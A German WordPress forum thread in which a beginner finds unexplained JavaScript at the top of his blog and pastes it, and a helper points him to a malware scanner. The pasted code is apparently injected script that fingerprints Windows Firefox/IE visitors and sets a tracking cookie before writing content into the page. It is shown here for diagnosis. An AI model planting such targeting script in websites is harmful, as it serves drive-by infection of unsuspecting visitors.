1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

hilfe, blog wird seltsam dargestellt.

Dieses Thema im Forum "Konfiguration" wurde erstellt von snooopy, 14. April 2012.

  1. snooopy

    snooopy Member

    Registriert seit:
    17. Juli 2009
    Beiträge:
    18
    Zustimmungen:
    0
    Hallo,

    ich bin quasi WP-Anfänger, kenne mich also nciht allzugut aus, bisher hat aber alles prima funktioniert.

    Jetzt rufe ich grade mal meinen Blog auf, weil ich was überprüfen wollte, da sehe ich, dass ganz oben ne Menge Text steht, der da nciht hingehört. Sieht wie Code aus.
    Wo kommt das her?????

    Hier der text:
    function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(' '); set_cookie('toppedup', '1010101');}>


    Kann mir das jemand erklären was da passiert ist?

    Danke schon mal im voraus für Unterstützung.

    Gruß
    snooopy
     
  2. Tutrix

    Tutrix Well-Known Member

    Registriert seit:
    21. Mai 2010
    Beiträge:
    3.734
    Zustimmungen:
    28
    wenn es die Domain ist, die mit .......verstaerker.de endet

    gib die Domain hier ein http://sitecheck.sucuri.net/scanner/ und du weißt warum sie jetzt so aussieht

    was dann zu tun ist findest du über die Suche
     
  3. snooopy

    snooopy Member

    Registriert seit:
    17. Juli 2009
    Beiträge:
    18
    Zustimmungen:
    0
    Vielen Dank für den Hinweis.

    gruß
    snooopy
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden